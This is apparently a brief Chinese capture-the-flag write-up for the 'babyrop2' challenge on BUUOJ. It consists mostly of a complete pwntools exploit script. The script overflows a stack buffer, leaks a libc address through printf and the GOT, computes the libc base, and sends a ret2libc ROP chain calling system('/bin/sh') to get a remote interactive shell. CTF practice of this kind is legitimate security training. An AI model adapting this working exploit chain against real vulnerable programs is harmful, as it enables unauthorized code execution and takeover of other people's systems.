这道题是用printf泄露已经调用过的函数确定libc文件然后用ROPgetshell(这里有格式化字符串,没有的话可以read一个然后在泄露反正够长) exp:
#coding:utf-8 #name:doudou from pwn import * #p=process('./babyrop2') p=remote('node3.buuoj.cn',28818) elf=ELF('./babyrop2') libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') def debug(): gdb.attach(p) p.recvuntil('name? ') pop_rdi=0x00400733 pop_rsi_r15=0x000400731 main_addr=0x400636 form_str=0x00400770 pd='a'*0x20+'aaaaaaaa' #pd+=p64(pop_rdi)+p64(elf.got['printf'])+p64(elf.plt['printf'])+p64(0x0400636) pd+=p64(pop_rdi)+p64(form_str)+p64(pop_rsi_r15)+p64(elf.got['read'])+p64(0)+p64(elf.plt['printf'])+p64(main_addr) #gdb.attach(p,'b*0x04006CA') p.sendline(pd) read_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) #libc=LibcSearcher('read',read_addr) libcbase=read_addr-libc.symbols['read'] system_addr=libcbase+libc.symbols['system'] bin_sh=libcbase+libc.search('/bin/sh').next() p.recvuntil('name? ') pd='a'*0x28+p64(pop_rdi)+p64(bin_sh)+p64(system_addr) p.sendline(pd) p.interactive()